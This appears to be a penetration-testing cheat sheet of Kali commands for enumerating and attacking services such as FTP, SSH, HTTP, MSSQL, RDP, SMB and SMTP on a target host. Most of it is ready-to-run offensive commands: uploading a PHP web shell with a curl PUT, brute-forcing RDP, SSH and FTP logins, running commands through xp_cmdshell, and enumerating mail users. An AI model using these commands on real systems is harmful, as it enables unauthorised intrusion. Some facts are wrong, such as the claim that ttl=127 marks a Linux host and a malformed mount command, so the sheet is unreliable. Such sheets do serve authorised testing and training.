TTL can help us determine the operating system of the target machine. In a basic ping command, an output would look similar to the following:
> ping 10.10.10.10
PING 10.10.10.10 (10.10.10.10) 56(84) bytes of data.
64 bytes from 10.10.10.10: icmp_seq=1 ttl=127 time=88.4 ms
The TTL drops 1 each time it passes through a router. If in the above example the ttl=127, then it is safe to assume (from this information alone) that the host, 10.10.10.10, is a Linux host.
TTL table and thier operating system listed below.
# NMAP all ftp script check against FTP 21
# scripts located in /usr/share/nmap/scripts/
Kali> nmap --script=ftp-anon.nse,ftp-bounce.nse,ftp-brute.nse,ftp-libopie.nse,ftp-proftpd-backdoor.nse,ftp-syst.nse,ftp-vsftpd-backdoor.nse,ftp-vuln-cve2010-4221.nse,tftp-enum.nse -p 21 $TARGET
# Check for anonymous access
Kali> ftp $targetip
Kali> Username: anonymous
Kali> Password: anything
SSH - 22 TCP
NMAP all ssh scripts against SSH 22
scripts located in /usr/share/nmap/scripts/
Kali> nmap --script=ssh2-enum-algos.nse,ssh-auth-methods.nse,ssh-brute.nse,ssh-hostkey.nse,ssh-publickey-acceptance.nse,ssh-run.nse,sshv1.nse -p 22 $TARGET
Kali> dirb http://$TARGET /usr/share/wordlists/dirb/big.txt -o dirb.txt
Kali> dirb http://$TARGET -r -o dirb-$TARGET.txt
Kali> gobuster -u http://$TARGET -w /usr/share/wordlists/dirb/big.txt -t 100
Kali> gobuster -u http://$TARGET -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
# A little for loop so you can go do other stuff
Kali> for wordlist in $(ls);do gobuster -u http://$TARGET -w $wordlist -t 100;done
# dirsearch is fairly good
Kali> dirsearch -u http://$TARGET -e php
cURL
# Robots can give us a clue as to where to look next you may have to send a user agent
Kali> curl -s http://$TARGET/robots.txt
# Check all the methods
Kali> curl -vX OPTIONS $TARGET
# Get header
Kali> curl -i $TARGET
# Get everything
Kali> curl -i -L $TARGET
# Check for title and all links
Kali> curl $TARGET -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
# Look at page with just text
Kali> curl $TARGET -s -L | html2text -width '99' | uniq
# Check if it is possible to upload
Kali> curl -v -X OPTIONS http://$TARGET/
Kali> curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://$TARGET/test/shell.php
# Basic
Kali> nikto -h http://$TARGET
# Include specific tuning, see further below
Kali> nikto -Tuning x 6 -h http://$TARGET
0 - File Upload
1 - Interesting File / Seen in logs
2 - Misconfiguration / Default File
3 - Information Disclosure
4 - Injection (XSS/Script/HTML)
5 - Remote File Retrieval - Inside Web Root
6 - Denial of Service
7 - Remote File Retrieval - Server Wide
8 - Command Execution / Remote Shell
9 - SQL Injection
a - Authentication Bypass
b - Software Identification
c - Remote Source Inclusion
x - Reverse Tuning Options (i.e., include all except specified)
BurpSuite
I don't care who you are or what you're doing but it's time to go poke the website with burp. Play with all the things, get params, post params, cookies, user agents, referrers in fact all the headers, change get requests to posts, take note of all error codes, fuzz parameter values, and names, etc.
Kali> for sub in $(cat subdomains.txt);do host $sub.domain.com|grep "has.address";done
Kali> dnsrecon -d $TARGET -D wordlist.txt -t std --xml output.xml
POP3 - 110 TCP
# Connect
Kali> telnet $TARGET 110
# Login
USER pelle@$TARGET
PASS admin
# or
USER pelle
PASS admin
# List all emails
list
# Retrieve email number 5, for example
retr 9
DATABASES
MSSQL - 1433
Kali> nmap -sU --script=ms-sql-info $TARGET
# Log in to mssql
Kali> sqsh -S $TARGET -U sa
# Execute commands
mssql> xp_cmdshell 'date'
mssql> go
ORACLE - 1521
# Check version or status of host specified
Kali> tnscmd10g version -h $TARGET
Kali> tnscmd10g status -h $TARGET
# Connect to instance
mysql --host=$TARGET -u root -p
# NMAP #note:this command might overload the target and it will appear as if it's down. Give it some time.
Kali> nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $TARGET -p 3306
# Configuration location
/var/www/html/configuration.php
Common UNIX Printing System has become the standard for sharing printers on a linux-network. You will often see port 631 open in your priv-esc enumeration when you run netstat. You can log in to it here: http://localhost:631/admin
You authenticate with the OS-users. Find version. Test cups-config --version. If this does not work surf to http://localhost:631/printers and see the CUPS version in the title bar of your browser.
There are vulnerabilities for it so check your searchsploit.
NFS - 2049
Kali> showmount -e $TARGET
# If you find anything you can mount it like this:
Kali> mount $TARGET:/ /tmp/NFS
Kali> mount -t $TARGET:/ /tmp/NFS
RPC
Examples
Kali> rpcinfo -p $TARGET
RPCBind
Kali> rpcbind -p 192.168.1.101
RDP - 3389
Examples
# Connect to instance
Kali> rdesktop -u admin -p password $TARGET
# Test logging in to see what OS is running
Kali> rdesktop -u guest -p guest $TARGET -g 94%
# Brute force logins for User with password list
Kali> ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://$TARGET
# Sometimes shows logged in users/addresses
Kali> nbtscan $TARGET -R 54
# NMAP
Kali> nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse $TARGET -p 445
SMTP - 25 TCP
VRFY username (verifies if username exists ā enumeration of accounts)
EXPN username (verifies if username is valid ā enumeration of accounts)
# Other commands
HELO -
EHLO - Extended SMTP.
STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify is the email user's mailbox exists.
# NMAP all smtp scripts
Kali> nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $TARGET
# Check for users (requires txt list of users.txt)
Kali> for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 1 <$TARGET> 25 2>/dev/null | grep ^"250";done